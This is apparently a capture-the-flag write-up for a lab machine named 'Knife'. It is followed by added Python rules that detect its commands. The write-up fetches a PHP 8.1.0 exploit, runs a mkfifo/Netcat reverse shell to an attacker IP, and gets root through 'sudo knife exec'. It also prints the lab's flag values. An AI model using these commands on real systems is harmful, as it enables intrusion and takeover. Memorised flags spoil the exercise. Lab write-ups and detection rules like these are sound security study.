MACHINE-KNIFE
SUBMITTED BY
VIVEK A
2. ENUMERATION
We opened port 80 and the website loaded, but there is nothing we can do on this website.
We then used a tool called Wappalyzer to enumerate further. Using that tool, we found the PHP
version of the website to be 8.1.0.
I searched for an exploit for PHP 8.1.0 and found a program file for exploitation.
Then, using wget, I downloaded the program file and renamed it to a Python file.
wget https://www.exploit-db.com/raw/49933
3. EXPLOITATION
Then I ran the Python file and exploited the target machine.
python file.py
After exploiting this machine, I still couldn’t perform any operations. So, to continue further, I
used another tool called Netcat.
Then, in the previous terminal in which Python is running, I entered the following command.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.75 1234 >/tmp/f
This command is entered to move further using Netcat.
When I looked into the home directory on the system, I found the user directory JAMES and found the user flag.
3996b98220f1bb8b675640e9f5086408
4. PRIVILEGE ESCALATION
Using the command below, we try to get root access.
sudo /usr/bin/knife exec --exec "exec '/bin/bash -i'"
Finally, we got root access and found the root flag.
1ce3e62bc3d0600f691e21eb4a41a411
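
From the defender's side, the two command lines used in sections 3 and 4 (the mkfifo/Netcat shell and sudo knife exec) are distinctive enough to alert on in process-execution logs. The following is an added example, not part of the original writeup; the (user, command line) record format, the rule names and every sample record, including the 192.0.2.x addresses, are constructed assumptions.

```python
import re
import shlex

# Constructed sample process-execution records (user, command line); not from the page.
SAMPLE_EVENTS = [
    ("www-data", "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 1234 >/tmp/f"),
    ("james", "sudo /usr/bin/knife exec --exec \"exec '/bin/bash -i'\""),
    ("james", "sudo /usr/bin/knife node list"),   # benign knife use
    ("backup", "mkfifo /var/run/backup.pipe"),    # benign named pipe
    ("root", "nc -z 192.0.2.20 443"),             # benign port check
]

SHELL = r"(?:/bin/)?(?:ba|da|z)?sh\b"

def fifo_reverse_shell(cmd):
    """Named pipe feeding an interactive shell whose output goes to a netcat client."""
    m = re.search(r"\bmkfifo\s+(\S+?)(?:;|\s|$)", cmd)
    if not m:
        return False
    fifo = re.escape(m.group(1))
    reads_fifo = re.search(rf"\bcat\s+{fifo}\s*\|\s*{SHELL}\s+-i", cmd)
    writes_fifo = re.search(rf"\b(?:nc|ncat|netcat)\b[^|;]*>\s*{fifo}", cmd)
    return bool(reads_fifo and writes_fifo)

def sudo_knife_exec(cmd):
    """knife's exec subcommand evaluates Ruby, so running it under sudo yields a root shell."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: not parseable as a command line
        return False
    names = [a.rsplit("/", 1)[-1] for a in argv]
    if names[:1] != ["sudo"] or "knife" not in names:
        return False
    i = names.index("knife")
    return argv[i + 1 : i + 2] == ["exec"]

RULES = {
    "fifo-netcat-reverse-shell": fifo_reverse_shell,
    "sudo-knife-exec": sudo_knife_exec,
}

def detect(events):
    """Return (user, rule name) for every record that matches a rule."""
    return [(user, name) for user, cmd in events
            for name, rule in RULES.items() if rule(cmd)]

if __name__ == "__main__":
    for user, name in detect(SAMPLE_EVENTS):
        print(f"ALERT {name} user={user}")
```

Only the first two sample records raise alerts; the ordinary knife, mkfifo and nc invocations pass. The longer-term mitigation for the second rule is to avoid sudo rules that allow knife at all, since its exec subcommand runs arbitrary Ruby.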